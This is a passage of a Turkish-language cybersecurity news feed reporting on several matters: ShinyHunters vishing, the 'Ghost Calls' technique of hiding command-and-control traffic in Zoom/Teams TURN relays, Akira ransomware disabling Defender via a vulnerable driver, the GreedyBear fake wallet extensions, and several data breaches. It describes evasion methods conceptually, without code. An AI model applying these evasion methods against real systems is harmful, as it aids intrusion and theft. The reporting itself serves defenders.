<p data-start="1360" data-end="1790"><strong data-start="1360" data-end="1392">Vishing ve şantaj yöntemleri</strong><br data-start="1392" data-end="1395">Saldırılar, çalışanları hedef alan telefonla oltalama (vishing) teknikleriyle başlatılıyor. Grup, ele geçirdiği verileri kullanarak şirketlere e-posta yoluyla fidye talep ediyor. Şirketler ödeme yapmazsa verilerin sızdırılacağı tehdidinde bulunuyor. Bazı firmaların şimdiden ödeme yaptığı, bir şirketin verilerini sızdırmamak için yaklaşık 400 bin dolar değerinde Bitcoin gönderdiği öğrenildi.</p>
<p data-start="1792" data-end="2044"><strong data-start="1792" data-end="1815">Google’ın önlemleri</strong><br data-start="1815" data-end="1818">Google, saldırının ardından etki analizini tamamladığını ve gerekli güvenlik önlemlerini devreye aldığını açıkladı. Ancak ShinyHunters’ın saldırıları hâlen sürdüğü ve daha fazla büyük şirketin risk altında olduğu bildirildi.</p>
<p data-start="2046" data-end="2238"><strong data-start="2046" data-end="2058"></strong></p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Yeni “Ghost Calls” tekniği Zoom ve Teams sunucularını kötüye kullanarak gizli komuta-kontrol iletişimi sağlıyor</title>
            <link>https://cumha.com.tr/yeni-ghost-calls-teknigi-zoom-ve-teams-sunucularini-koetuye-kullanarak-gizli-komuta-kontrol-iletisimi-sagliyor</link>
            <guid>https://cumha.com.tr/yeni-ghost-calls-teknigi-zoom-ve-teams-sunucularini-koetuye-kullanarak-gizli-komuta-kontrol-iletisimi-sagliyor</guid>
            <description><![CDATA[ BlackHat USA’da tanıtılan “Ghost Calls” yöntemi, Zoom ve Microsoft Teams gibi uygulamalarda kullanılan TURN sunucularını istismar ederek saldırganların C2 trafiğini kurumsal video konferans trafiği gibi gizlemesine imkân tanıyor. Yöntem herhangi bir güvenlik açığı kullanmıyor, ancak WebRTC ve geçici kimlik bilgileri üzerinden savunma mekanizmalarını aşabiliyor. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202508/image_870x_68a452cd991aa.webp" length="42132" type="image/webp"/>
            
            <pubDate>Mon, 18 Aug 2025 12:09:01 +0300</pubDate>
            <dc:creator>Ebubekir Bastama</dc:creator>
            <media:keywords>Ghost Calls tekniği nasıl çalışıyor, Zoom ve Teams bu tehditten nasıl etkileniyor, TURNt aracı ne işe yarıyor, Zoom bu yönteme karşı hangi önlemleri aldı</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p></p>
<p data-start="535" data-end="857"><strong data-start="535" data-end="572">Görüşme trafiği kılıfında saldırı</strong><br data-start="572" data-end="575">Praetorian araştırmacısı Adam Crosser, “Ghost Calls” yöntemini BlackHat USA’da sundu. Bu teknik, Zoom ve Teams gibi konferans uygulamalarında kullanılan TURN protokolünü kullanarak saldırganların kurban sistem ile kendi altyapıları arasında WebRTC tüneli açmasına olanak sağlıyor.</p>
<p data-start="859" data-end="1255"><strong data-start="859" data-end="878">Nasıl çalışıyor</strong><br data-start="878" data-end="881">Bir kullanıcı Zoom ya da Teams toplantısına katıldığında, geçici TURN kimlik bilgileri alıyor. Ghost Calls, bu kimlik bilgilerini kötüye kullanarak saldırgan ile hedef sistem arasında şifrelenmiş bir WebRTC tüneli kuruyor. Bu tünel, saldırı trafiğini normal konferans trafiği gibi gösterdiği için güvenlik duvarları, proxy’ler ve TLS denetimleri tarafından fark edilmiyor.</p>
<p data-start="1257" data-end="1616"><strong data-start="1257" data-end="1277">Yeni araç: TURNt</strong><br data-start="1277" data-end="1280">Crosser, “TURNt” adlı açık kaynak bir araç geliştirdi. Bu araç, saldırgan tarafında bir Controller (SOCKS proxy sunucusu) ve kurban sistemde çalışan bir Relay bileşeninden oluşuyor. TURN sunucuları üzerinden C2 trafiğini tünelleyebilen TURNt, SOCKS proxying, port yönlendirme, veri sızdırma ve gizli VNC bağlantılarına imkân sağlıyor.</p>
<p data-start="1618" data-end="1925"><strong data-start="1618" data-end="1640">Zoom’dan ilk önlem</strong><br data-start="1640" data-end="1643">Zoom, BleepingComputer’a yaptığı açıklamada, Ghost Calls’a karşı TURN altyapısının yalnızca medya sunucularla eşleşmeye izin verecek şekilde güncellendiğini ve peer-to-peer bağlantıların engellendiğini duyurdu. Microsoft’un ek önlem planlarına dair ise henüz bir bilgi bulunmuyor.</p>
<p data-start="1927" data-end="2213"><strong data-start="1927" data-end="1945">Tehditin önemi</strong><br data-start="1945" data-end="1948">Ghost Calls, herhangi bir sıfır gün zafiyetine ihtiyaç duymadan, tamamen mevcut protokollerin doğasından yararlanıyor. Uzmanlara göre bu tür yöntemler, saldırganlara hem performans hem de anonimlik sağlıyor ve geleneksel C2 yöntemlerine göre daha gizli ilerliyor.</p>
<p data-start="2215" data-end="2387"><strong data-start="2215" data-end="2227"></strong></p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Akira fidye yazılımı, Intel CPU ayar sürücüsünü kötüye kullanarak Microsoft Defender’ı devre dışı bırakıyor</title>
            <link>https://cumha.com.tr/akira-fidye-yazilimi-intel-cpu-ayar-surucusunu-koetuye-kullanarak-microsoft-defenderi-devre-disi-birakiyor</link>
            <guid>https://cumha.com.tr/akira-fidye-yazilimi-intel-cpu-ayar-surucusunu-koetuye-kullanarak-microsoft-defenderi-devre-disi-birakiyor</guid>
            <description><![CDATA[ Guidepoint Security’nin raporuna göre Akira fidye yazılımı, “rwdrv.sys” adlı meşru Intel CPU ayarlama sürücüsünü kullanarak çekirdek ayrıcalıkları elde ediyor ve ardından “hlpdrv.sys” adlı zararlı sürücüyle Microsoft Defender’ı kapatıyor. Saldırılar, 15 Temmuz 2025’ten bu yana artış gösterirken, uzmanlar BYOVD taktiğiyle yapılan bu saldırılara karşı uyarıda bulundu. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202508/image_870x_68a46dfc3e8ea.webp" length="44598" type="image/webp"/>
            
            <pubDate>Mon, 18 Aug 2025 12:09:00 +0300</pubDate>
            <dc:creator>Ebubekir Bastama</dc:creator>
            <media:keywords>Akira fidye yazılımı Microsoft Defender’ı nasıl devre dışı bırakıyor, saldırılarda hangi sürücüler kullanılıyor, SonicWall VPN saldırılarıyla nasıl bağlantılı, Akira fidye yazılımı hangi yöntemlerle yayılıyor</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p></p>
<p data-start="536" data-end="878"><strong data-start="536" data-end="587">Meşru sürücüyle güvenlik devre dışı bırakılıyor</strong><br data-start="587" data-end="590">Akira fidye yazılımı, ThrottleStop aracıyla kullanılan Intel sürücüsü “rwdrv.sys” üzerinden çekirdek seviyesinde erişim sağlıyor. Ardından “hlpdrv.sys” adlı kötü amaçlı sürücüyü yükleyerek Windows Defender’ın <em data-start="799" data-end="819">DisableAntiSpyware</em> ayarını değiştiriyor ve korumaları devre dışı bırakıyor.</p>
<p data-start="880" data-end="1182"><strong data-start="880" data-end="908">BYOVD tekniğiyle saldırı</strong><br data-start="908" data-end="911">Bu yöntem, “Bring Your Own Vulnerable Driver” (BYOVD) saldırı tekniğinin bir örneği. Yasal olarak imzalı ancak güvenlik açıkları bulunan sürücüler kullanılarak sistemde ayrıcalık yükseltiliyor. Akira’nın bu tekniği son haftalarda tekrarlayan saldırılarda sıkça görüldü.</p>
<p data-start="1184" data-end="1521"><strong data-start="1184" data-end="1225">SonicWall VPN saldırılarıyla bağlantı</strong><br data-start="1225" data-end="1228">Akira grubu kısa süre önce SonicWall SSLVPN servislerini de hedef aldı. Zero-day açık ihtimali gündeme gelse de, SonicWall henüz doğrulama yapmadı. Şirket, SSLVPN’in sınırlandırılması, MFA zorunluluğu, botnet/Geo-IP filtreleri ve kullanılmayan hesapların silinmesi gibi acil önlemler önerdi.</p>
<p data-start="1523" data-end="1897"><strong data-start="1523" data-end="1562">Sahte yazılım siteleriyle yayılıyor</strong><br data-start="1562" data-end="1565">The DFIR Report’a göre saldırılarda trojanlı MSI kurulum dosyaları kullanılıyor. “ManageEngine OpManager” gibi yazılımları arayan kullanıcılar, SEO zehirlemesi yoluyla opmanager[.]pro gibi sahte sitelere yönlendiriliyor. Bu sitelerden indirilen dosyalar, Bumblebee yükleyicisi aracılığıyla Akira’nın sisteme yerleşmesini sağlıyor.</p>
<p data-start="1899" data-end="2247"><strong data-start="1899" data-end="1926">Saldırıların ilerleyişi</strong><br data-start="1926" data-end="1929">Bumblebee, DLL yan yükleme yöntemiyle başlatılıyor, ardından AdaptixC2 ile kalıcı erişim sağlanıyor. Saldırganlar FileZilla üzerinden veri sızdırıyor, RustDesk ve SSH tünelleriyle kalıcılığı sürdürüyor. Ortalama 44 saat içinde “locker.exe” fidye yazılımı devreye giriyor ve etki alanlarındaki sistemler şifreleniyor.</p>
<p data-start="2249" data-end="2490"><strong data-start="2249" data-end="2270">Uzmanlardan uyarı</strong><br data-start="2270" data-end="2273">Güvenlik araştırmacıları, yalnızca resmi kaynaklardan yazılım indirilmesini, Akira ile ilgili IoC’lerin yakından takip edilmesini ve BYOVD tabanlı saldırılara karşı güvenlik çözümlerinin güncel tutulmasını öneriyor.</p>
<p data-start="2492" data-end="2719"><strong data-start="2492" data-end="2504"></strong></p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Air France ve KLM müşteri verilerinin sızdırıldığını açıkladı: Ödül programı bilgileri ve iletişim verileri ele geçirildi</title>
            <link>https://cumha.com.tr/air-france-ve-klm-musteri-verilerinin-sizdirildigini-acikladi-odul-programi-bilgileri-ve-iletisim-verileri-ele-gecirildi</link>
            <guid>https://cumha.com.tr/air-france-ve-klm-musteri-verilerinin-sizdirildigini-acikladi-odul-programi-bilgileri-ve-iletisim-verileri-ele-gecirildi</guid>
            <description><![CDATA[ Air France ve KLM, dış müşteri hizmeti platformuna yönelik saldırıda bazı müşteri bilgilerinin yetkisiz kişilerce erişildiğini duyurdu. İsim, e-posta, telefon numarası, ödül programı bilgileri ve son işlem detayları sızdırılırken, finansal verilerin etkilenmediği belirtildi. Olay, ShinyHunters grubunun Salesforce tabanlı saldırı kampanyasıyla ilişkilendiriliyor. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202508/image_870x_68a46e1c11047.webp" length="38384" type="image/webp"/>
            
            <pubDate>Mon, 18 Aug 2025 12:08:59 +0300</pubDate>
            <dc:creator>Ebubekir Bastama</dc:creator>
            <media:keywords>Air France ve KLM veri ihlalinde hangi bilgiler sızdırıldı, saldırı hangi platformda gerçekleşti, olay hangi hacker gruplarıyla ilişkilendiriliyor, müşterilere hangi uyarılar yapıldı</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p></p>
<p data-start="546" data-end="826"><strong data-start="546" data-end="598">Saldırı müşteri hizmeti platformunda gerçekleşti</strong><br data-start="598" data-end="601">Air France ve KLM, 6 Ağustos 2025’te yaptıkları açıklamada, kullandıkları harici müşteri hizmeti platformunda olağandışı hareket tespit edildiğini ve bunun sonucunda müşteri verilerine yetkisiz erişim sağlandığını açıkladı.</p>
<p data-start="828" data-end="1105"><strong data-start="828" data-end="860">Finansal veriler etkilenmedi</strong><br data-start="860" data-end="863">Şirketten yapılan duyuruda, saldırganların isim, e-posta adresi, telefon numarası, ödül programı bilgileri ve son işlem kayıtlarına ulaştığı, ancak müşterilerin finansal bilgilerinin ve kişisel güvenlik verilerinin etkilenmediği vurgulandı.</p>
<p data-start="1107" data-end="1385"><strong data-start="1107" data-end="1158">Yetkililer bilgilendirildi, müşteriler uyarıldı</strong><br data-start="1158" data-end="1161">KLM, olayı Hollanda Veri Koruma Kurumu’na, Air France ise Fransa’daki CNIL’e bildirdi. Etkilenen müşterilere uyarı mesajları gönderilerek şüpheli e-posta ve telefon aramalarına karşı dikkatli olmaları gerektiği belirtildi.</p>
<p data-start="1387" data-end="1682"><strong data-start="1387" data-end="1422">ShinyHunters grubuna bağlanıyor</strong><br data-start="1422" data-end="1425">BleepingComputer’un ulaştığı bilgilere göre olay, Salesforce platformlarını hedef alan ve Adidas, Qantas, Dior, Louis Vuitton, Chanel, Tiffany &amp; Co. ile Google gibi markaları da etkileyen ShinyHunters grubunun sosyal mühendislik saldırılarıyla bağlantılı.</p>
<p data-start="1684" data-end="1946"><strong data-start="1684" data-end="1727">Havacılık sektörü saldırıların odağında</strong><br data-start="1727" data-end="1730">Air France–KLM olayı, son dönemde havacılık ve ulaşım sektörüne yönelen saldırıların bir parçası olarak değerlendiriliyor. Daha önce Scattered Spider grubu WestJet ve Hawaiian Airlines gibi firmaları hedef almıştı.</p>
<p data-start="1948" data-end="2149"><strong data-start="1948" data-end="1960"></strong></p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>28 bin kanal sunan dev korsan IPTV platformu Rare Breed TV kapatıldı</title>
            <link>https://cumha.com.tr/28-bin-kanal-sunan-dev-korsan-iptv-platformu-rare-breed-tv-kapatildi</link>
            <guid>https://cumha.com.tr/28-bin-kanal-sunan-dev-korsan-iptv-platformu-rare-breed-tv-kapatildi</guid>
            <description><![CDATA[ Kreatiflik ve Eğlence İttifakı (ACE), 100 binden fazla film ve dizi içeriği ile 28 bin kanalı izinsiz yayınlayan Rare Breed TV’nin kapatıldığını açıkladı. Kuzey Carolina merkezli işletmeciler, finansal tazminat ödemeyi ve korsan yayını kalıcı olarak durdurmayı kabul etti. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202508/image_870x_68a46e334c8c2.webp" length="73996" type="image/webp"/>
            
            <pubDate>Mon, 18 Aug 2025 12:08:58 +0300</pubDate>
            <dc:creator>Ebubekir Bastama</dc:creator>
            <media:keywords>Rare Breed TV hangi içerikleri sunuyordu, ACE ile nasıl bir anlaşmaya varıldı, platform neden kapatıldı, daha önce hangi korsan yayın servisleri hedef alındı</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p></p>
<p data-start="401" data-end="672"><strong data-start="401" data-end="437">Yıllardır korsan yayın yapıyordu</strong><br data-start="437" data-end="440">Kuzey Carolina merkezli Rare Breed TV, dünyanın en büyük korsan IPTV hizmetlerinden biri olarak öne çıkıyordu. Platform, aylık 15,99 dolardan başlayan aboneliklerle binlerce canlı kanal ve 14 bini aşkın film-dizi arşivi sunuyordu.</p>
<p data-start="674" data-end="988"><strong data-start="674" data-end="701">ACE’den yaptırım kararı</strong><br data-start="701" data-end="704">Amazon, Netflix, Disney, Warner Bros. ve Apple TV+ gibi 50’den fazla şirketin yer aldığı ACE, korsan IPTV hizmetini tespit ettikten sonra işletmecilerle iletişime geçti. Taraflar arasında varılan anlaşmayla platformun kapatılması ve ciddi miktarda tazminat ödenmesi kararlaştırıldı.</p>
<p data-start="990" data-end="1215"><strong data-start="990" data-end="1017">Site hâlen erişime açık</strong><br data-start="1017" data-end="1020">ACE açıklamasına rağmen Rare Breed TV’nin web sitesinin habere konu tarihte hâlâ erişime açık olduğu ve abonelik satışına devam ettiği görüldü. Konuyla ilgili olarak ACE’den ek yorum alınamadı.</p>
<p data-start="1217" data-end="1647"><strong data-start="1217" data-end="1263">Küresel korsan yayın operasyonları hedefte</strong><br data-start="1263" data-end="1266">ACE, bugüne kadar Openload, Streamango, Beast IPTV, 123movies.la ve anime platformu Zoro.to gibi çok sayıda korsan servisi kapattı. Geçtiğimiz yıl Jetflicks davasında beş kişiye ceza verilmesine, 22 milyon kullanıcılı ve aylık 250 milyon euro gelir elde eden bir korsan ağının çökertilmesine ve 821 milyon yıllık ziyaretçiye sahip Markkystreams’in kapatılmasına da katkı sağladı.</p>
<p data-start="1649" data-end="1917"><strong data-start="1649" data-end="1676">Uyarı niteliğinde mesaj</strong><br data-start="1676" data-end="1679">ACE’nin bağlı olduğu Sinema Filmleri Derneği (MPA) Başkan Yardımcısı Larissa Knapp, “Bu yaptırım korsan yayıncılara ciddi bir uyarıdır. Yasadışı yayın hizmeti işletmek, davalar, ağır mali cezalar ve kalıcı kapatmalarla sonuçlanır” dedi.</p>
<p data-start="1919" data-end="2095"><strong data-start="1919" data-end="1931"></strong></p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Samourai Wallet kurucuları 200 milyon doları aşkın kara para aklamaktan suçunu kabul etti</title>
            <link>https://cumha.com.tr/samourai-wallet-kuruculari-200-milyon-dolari-askin-kara-para-aklamaktan-sucunu-kabul-etti</link>
            <guid>https://cumha.com.tr/samourai-wallet-kuruculari-200-milyon-dolari-askin-kara-para-aklamaktan-sucunu-kabul-etti</guid>
            <description><![CDATA[ ABD Adalet Bakanlığı’na göre, kripto karıştırıcı hizmeti Samourai Wallet’ın CEO’su Keonne Rodriguez ve CTO’su William Lonergan Hill, suç gelirlerini aklamaya yardım ettiklerini kabul etti. Kurucular, beş yıla kadar hapis cezasıyla karşı karşıya ve 237 milyon dolardan fazla tutarı devlete devretmeyi kabul etti. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202508/image_870x_68a46e581c1f3.webp" length="83000" type="image/webp"/>
            
            <pubDate>Mon, 18 Aug 2025 12:08:57 +0300</pubDate>
            <dc:creator>Ebubekir Bastama</dc:creator>
            <media:keywords>Samourai Wallet kurucuları hangi suçları kabul etti, kara para aklama faaliyetinde ne kadar Bitcoin işlendi, uygulama ne zaman kapatıldı, kurucuların cezası ne olabilir</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p></p>
<p data-start="461" data-end="729"><strong data-start="461" data-end="489">Kara para aklama itirafı</strong><br data-start="489" data-end="492">Rodriguez ve Hill, Samourai Wallet üzerinden kara para aklama faaliyetlerine bilerek aracılık ettiklerini kabul etti. İkilinin, suç gelirlerinin gizlenmesini sağlamak için “Whirlpool” ve “Ricochet” adlı hizmetleri sunduğu ortaya çıktı.</p>
<p data-start="731" data-end="998"><strong data-start="731" data-end="757">80 bin Bitcoin işlendi</strong><br data-start="757" data-end="760">Mahkeme belgelerine göre, 2015–2024 yılları arasında hizmet aracılığıyla 80 binden fazla Bitcoin (2 milyar doların üzerinde) yasa dışı kaynaktan geçirilerek karıştırıldı. Bu işlemlerden yaklaşık 6 milyon dolar hizmet ücreti elde edildi.</p>
<p data-start="1000" data-end="1264"><strong data-start="1000" data-end="1027">Tutuklamalar ve kapatma</strong><br data-start="1027" data-end="1030">Kurucular Nisan 2024’te tutuklandı. Aynı gün İzlanda polisi Samourai’nin internet alan adlarını ve sunucularını ele geçirdi, Google ise uygulamayı Play Store’dan kaldırdı. Uygulama, kapanmadan önce 100 binden fazla kez indirilmişti.</p>
<p data-start="1266" data-end="1512"><strong data-start="1266" data-end="1292">Suçun bilincindeydiler</strong><br data-start="1292" data-end="1295">Savcıların aktardığına göre, Rodriguez WhatsApp yazışmalarında “karıştırmayı bitcoin için kara para aklama” olarak tanımladı. Hill ise karanlık ağ forumlarında Samourai’yi “kirli BTC temizleme aracı” olarak tanıttı.</p>
<p data-start="1514" data-end="1848"><strong data-start="1514" data-end="1549">Mahkeme süreci ve ceza ihtimali</strong><br data-start="1549" data-end="1552">İkili, suçunu kabul ederek kara para aklama operasyonunu yürüttüğünü kabul etti. Anlaşma kapsamında 237,8 milyon dolar tutarında varlığı devlete bırakacaklar. Rodriguez ve Hill, para aklama suçlamasında 20 yıla kadar, izinsiz para transferi suçlamasında ise 5 yıla kadar hapisle yargılanıyordu.</p>
<p data-start="1850" data-end="2037"><strong data-start="1850" data-end="1862"></strong></p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Firefox eklenti mağazasında 150 sahte kripto cüzdanı uzantısı: Kullanıcılardan 1 milyon dolar çalındı</title>
            <link>https://cumha.com.tr/firefox-eklenti-magazasinda-150-sahte-kripto-cuzdani-uzantisi-kullanicilardan-1-milyon-dolar-calindi</link>
            <guid>https://cumha.com.tr/firefox-eklenti-magazasinda-150-sahte-kripto-cuzdani-uzantisi-kullanicilardan-1-milyon-dolar-calindi</guid>
            <description><![CDATA[ “GreedyBear” adlı kampanyayla Mozilla’nın Firefox eklenti mağazasına yüklenen 150 zararlı uzantı, MetaMask ve TronLink gibi popüler cüzdanları taklit ederek kullanıcıların kripto cüzdan bilgilerini ele geçirdi. Koi Security’ye göre saldırganlar yaklaşık 1 milyon dolar değerinde kripto varlığı çaldı. Mozilla, uzantıları mağazadan kaldırdı. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202508/image_870x_68a46e64e40ff.webp" length="38222" type="image/webp"/>
            
            <pubDate>Mon, 18 Aug 2025 12:08:56 +0300</pubDate>
            <dc:creator>Ebubekir Bastama</dc:creator>
            <media:keywords>GreedyBear kampanyası Firefox mağazasında nasıl yayıldı, hangi bilgileri hedef aldı, saldırganlar ne kadar kripto para çaldı, Chrome mağazasına yayılma riski var mı</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p></p>
<p data-start="502" data-end="768"><strong data-start="502" data-end="544">Sahte cüzdan uzantıları mağazaya sızdı</strong><br data-start="544" data-end="547">Koi Security’nin bulgularına göre saldırganlar, sahte kripto cüzdanı uzantılarını ilk etapta zararsız görünecek şekilde mağazaya yükledi. Onay aldıktan sonra ise marka ve logoları değiştirip zararlı kod enjekte ettiler.</p>
<p data-start="770" data-end="1043"><strong data-start="770" data-end="815">Kullanıcı bilgileri keylogger ile çalındı</strong><br data-start="815" data-end="818">Uzantılara entegre edilen kod, kullanıcıların cüzdan giriş bilgilerini eklenti pencerelerindeki form alanlarından kaydederek saldırganların kontrolündeki uzak sunuculara gönderdi. Ayrıca kurbanların IP adresleri de izlendi.</p>
<p data-start="1045" data-end="1401"><strong data-start="1045" data-end="1076">Sahte sitelerle desteklendi</strong><br data-start="1076" data-end="1079">Kampanyaya paralel olarak, Trezor ve Jupiter Wallet gibi bilinen cüzdan sağlayıcılarını taklit eden çok sayıda sahte web sitesi açıldı. Bu siteler, LummaStealer gibi bilgi hırsızları ve fidye yazılımları dahil 500’den fazla zararlı yazılımın dağıtımını yaptı. Tüm operasyon, 185.208.156.66 IP adresi üzerinden yönetildi.</p>
<p data-start="1403" data-end="1631"><strong data-start="1403" data-end="1436">AI desteğiyle ölçeklendirildi</strong><br data-start="1436" data-end="1439">Araştırmaya göre kampanyada kullanılan kodlarda yapay zekâ izleri görüldü. Bu sayede saldırganların farklı yükler geliştirmesi, tespitten kaçınması ve saldırıları hızla büyütmesi kolaylaştı.</p>
<p data-start="1633" data-end="1892"><strong data-start="1633" data-end="1665">Mozilla eklentileri kaldırdı</strong><br data-start="1665" data-end="1668">Mozilla, şikâyetlerin ardından uzantıları mağazadan kaldırdı. Ancak kampanyanın büyüklüğü, daha önce Haziran 2025’te devreye alınan koruma sistemine rağmen sahte cüzdan uzantılarının hâlâ mağazaya sızabildiğini gösteriyor.</p>
<p data-start="1894" data-end="2104"><strong data-start="1894" data-end="1931">Chrome mağazasına da sıçrayabilir</strong><br data-start="1931" data-end="1934">Koi Security, GreedyBear grubunun Chrome Web Store’a da geçmeyi planladığını ve şimdiden “Filecoin Wallet” adlı sahte bir Chrome uzantısının tespit edildiğini bildirdi.</p>
<p data-start="2106" data-end="2345"><strong data-start="2106" data-end="2136">Kullanıcılar için öneriler</strong><br data-start="2136" data-end="2139">Uzmanlar, eklenti kurmadan önce yayıncı bilgilerini ve kullanıcı yorumlarını kontrol etmeyi, resmi cüzdan projelerinin yalnızca kendi sitelerinden yönlendirdiği bağlantılarla indirilmesini tavsiye ediyor.</p>
<p data-start="2347" data-end="2530"><strong data-start="2347" data-end="2359"></strong></p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>SonicWall: Akira saldırıları sıfır gün değil, 2024’te yamalanan SSLVPN açığı hedef alındı</title>
            <link>https://cumha.com.tr/sonicwall-akira-saldirilari-sifir-gun-degil-2024te-yamalanan-sslvpn-acigi-hedef-alindi</link>
            <guid>https://cumha.com.tr/sonicwall-akira-saldirilari-sifir-gun-degil-2024te-yamalanan-sslvpn-acigi-hedef-alindi</guid>
            <description><![CDATA[ SonicWall, Gen 7 güvenlik duvarlarını hedef alan son Akira fidye yazılımı saldırılarının yeni bir sıfır gün açığa değil, 2024’te yamalanan CVE-2024-40766 güvenlik açığına dayandığını açıkladı. Şirket, etkilenen sistemlerde şifre sıfırlama adımının atlandığını, kullanıcıların acilen yazılım güncellemesi ve parola yenilemesi yapması gerektiğini duyurdu. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202508/image_870x_68a46e71849be.webp" length="40334" type="image/webp"/>
            
            <pubDate>Mon, 18 Aug 2025 12:08:55 +0300</pubDate>
            <dc:creator>Ebubekir Bastama</dc:creator>
            <media:keywords>SonicWall saldırılarında sıfır gün mü kullanıldı, CVE-2024-40766 açığı neye sebep oluyor, hangi yanlış adımlar saldırıları kolaylaştırdı, kullanıcılar hangi güvenlik önlemlerini almalı</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p></p>
<p data-start="503" data-end="811"><strong data-start="503" data-end="535">Sıfır gün iddiası reddedildi</strong><br data-start="535" data-end="538">Geçtiğimiz hafta Arctic Wolf Labs, SonicWall Gen 7 cihazlarını hedef alan saldırıların sıfır gün açığa işaret edebileceğini duyurmuştu. Ancak SonicWall, yaptığı incelemeler sonucunda saldırıların CVE-2024-40766 adlı bilinen bir zafiyet üzerinden gerçekleştiğini bildirdi.</p>
<p data-start="813" data-end="1063"><strong data-start="813" data-end="837">CVE-2024-40766 nedir</strong><br data-start="837" data-end="840">Bu açık, SonicOS yazılımındaki SSLVPN erişim kontrol zafiyeti nedeniyle yetkisiz kişilerin VPN oturumlarını ele geçirmesine imkân tanıyor. Açık, Ağustos 2024’te yayımlanan SNWLID-2024-0015 danışma belgesiyle duyurulmuştu.</p>
<p data-start="1065" data-end="1417"><strong data-start="1065" data-end="1103">Migrasyon hataları istismar edildi</strong><br data-start="1103" data-end="1106">SonicWall, 40 farklı olayın incelenmesi sonucunda pek çok vakada Gen 6’dan Gen 7’ye geçişte yerel kullanıcı parolalarının sıfırlanmadığını ve bunun saldırganların sisteme erişimini kolaylaştırdığını belirtti. Oysa parolaların sıfırlanması, orijinal güvenlik tavsiyelerinde kritik bir adım olarak açıklanmıştı.</p>
<p data-start="1419" data-end="1694"><strong data-start="1419" data-end="1444">Yeni önerilen adımlar</strong><br data-start="1444" data-end="1447">Şirket, kullanıcıların cihaz yazılımını 7.3.0 veya daha yeni sürümlere yükseltmesini, SSLVPN için kullanılan tüm yerel hesap parolalarının derhal sıfırlanmasını ve mümkünse erişimin yalnızca güvenilir IP’lerle sınırlandırılmasını tavsiye ediyor.</p>
<p data-start="1696" data-end="2040"><strong data-start="1696" data-end="1732">Kullanıcıların şüpheleri sürüyor</strong><br data-start="1732" data-end="1735">Buna rağmen bazı kullanıcılar, Reddit’te yaptıkları yorumlarda SonicWall’ın açıklamalarının kendi deneyimleriyle örtüşmediğini, hatta bazı log dosyalarının incelenmediğini iddia etti. Bu nedenle uzmanlar, resmi açıklamaların ötesinde yüksek düzeyde dikkat ve hızlı önlem alınması gerektiğini vurguluyor.</p>
<p data-start="2042" data-end="2245"><strong data-start="2042" data-end="2054"></strong></p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Bouygues Telecom’da veri ihlali: 6,4 milyon müşterinin kişisel bilgileri sızdırıldı</title>
            <link>https://cumha.com.tr/bouygues-telecomda-veri-ihlali-64-milyon-musterinin-kisisel-bilgileri-sizdirildi</link>
            <guid>https://cumha.com.tr/bouygues-telecomda-veri-ihlali-64-milyon-musterinin-kisisel-bilgileri-sizdirildi</guid>
            <description><![CDATA[ Fransa’nın en büyük telekom şirketlerinden Bouygues Telecom, 4 Ağustos 2025’te gerçekleşen siber saldırıda 6,4 milyon müşteriye ait kişisel verilerin ele geçirildiğini açıkladı. Şirket, kredi kartı bilgilerinin ve şifrelerin etkilenmediğini duyurdu ancak IBAN, iletişim ve sözleşme bilgilerinin sızdırıldığını bildirdi. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202508/image_870x_68a46e7e3e782.webp" length="51272" type="image/webp"/>
            
            <pubDate>Mon, 18 Aug 2025 12:08:54 +0300</pubDate>
            <dc:creator>Ebubekir Bastama</dc:creator>
            <media:keywords>Bouygues Telecom veri ihlalinde hangi bilgiler sızdırıldı, saldırı ne zaman gerçekleşti, müşteriler için hangi riskler oluştu, şirket hangi önlemleri aldı</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p></p>
<p data-start="463" data-end="795"><strong data-start="463" data-end="499">Saldırı 4 Ağustos’ta gerçekleşti</strong><br data-start="499" data-end="502">Bouygues Telecom, 4 Ağustos 2025 Pazar günü bir siber saldırıya uğradığını ve yetkisiz erişim sonucu 6,4 milyon müşteriye ait kişisel verilerin ele geçirildiğini doğruladı. Şirketin teknik ekipleri saldırıya hızlı şekilde müdahale ettiklerini ve ek güvenlik önlemlerinin alındığını açıkladı.</p>
<p data-start="797" data-end="1147"><strong data-start="797" data-end="828">Etkilenen müşteri bilgileri</strong><br data-start="828" data-end="831">Yapılan açıklamaya göre saldırıda ele geçirilen veriler arasında müşterilerin iletişim bilgileri, sözleşme detayları, medeni durum verileri, kurumsal müşterilere ait şirket bilgileri ve IBAN numaraları bulunuyor. Şirket, kredi kartı bilgilerinin ve müşteri hesap şifrelerinin bu ihlalden etkilenmediğini vurguladı.</p>
